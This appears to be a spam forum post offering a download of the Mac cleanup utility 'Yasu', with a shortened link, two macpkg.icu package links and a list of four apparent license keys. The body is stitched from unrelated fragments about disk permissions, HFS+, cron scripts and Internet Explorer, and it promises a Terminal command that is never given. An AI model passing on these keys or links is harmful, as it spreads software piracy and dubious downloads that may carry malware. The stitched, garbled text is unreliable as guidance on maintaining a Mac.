Post by inguiremaver on May 13, 2019 4:06:57 GMT -7
Main category - Utilities
Sub category - Optimizers
Developer - Jim Mitchell
Filesize - 4096
Title - Yasu
bit.ly/2WDEvHm
◐ v.5.0.2 Yasu
You should run Repair Disk Permissions regularly. Maybe once a month, and every time after you have installed new software. (Contrary to popular belief, it is not at all necessary to run Repair Disk Permissions prior to installing new software. Though doing so won’t hurt anything.) Type, or paste, the following command into Terminal, where [YOUR DRIVE NAME] is the name you gave the installer drive when you formatted it: HFS+ is a dual-fork journaled fs with metadata support. HFS+ is a fragmenting FS, although with hot-file clustering the need for explicit de-fragmentation is pretty low. By default HFS+ is case-insensitive but case-preserving. You can configure it as fully case-sensitive by reformatting, but this is a very uncommon configuration and many user apps will break. Best options to select before a backup are the defaults. If you've installed it, and not changed any of the settings, those are the defaults. After the reboot, your Mac will require setting up like a new one. Imagine you just bought it and proceed to fill in all the gaps — WiFi, iCloud with Apple ID, Dropbox, accounts, passwords. Could take a while but remember, it was worth it. DaisyDisk, Software Ambience Corp
Site:
MacOS macpkg.icu/?id=13416&kw=Yasu-vers-5.0.3-kmZhVp.tar.gz [4464 KB]
Featured! version macpkg.icu/?id=13416&kw=yasu_ver_5.0.1_qyxt.pkg [4669 KB]
Key list
332VBM-L3IGW1-VKOLR9-1XYMG7
ANGGDY-79C3B3-QZRGLY-K0KNSZ
W81VQY-39AXJG-PTTHAW-EXIOL5
385CTP-3HFT1G-2KQXAK-IYQ8PT
Yasu is a utility that allows system administrators, as well as standard users, to easily clean and maintain several different areas of their Mac system. Ordinarily this could mean having to access a number of system settings or manually running a large number of script. But with Yasu you can simply select the cleanup operations you would like to perform and they will be executed in one fell swoop. Such improvements in the latest versions include: After updating, your ~/.bash_profile should look similar to mine below: Top 15 alternatives to CCleaner for Mac What are these? Well, your Mac routinely runs three maintenance scripts – these are known as the daily, weekly and monthly cron scripts. explains these scripts nicely, but to summarize the core functions of each script: Microsoft Internet Explorer is no longer supported (some might argue it wasn’t really supported when it was supported) Prior to OS X 10.5, if you didn't leave your computer on 24 hours a day, or if you left it on but you let it go into sleep mode at night, these routines weren't run. As of OS X 10.5 and later your Mac will run its maintenance scripts automatically at the next available opportunity if you put your Mac into sleep mode all night. Though the scripts still won't run if you shut your Macintosh down at night.
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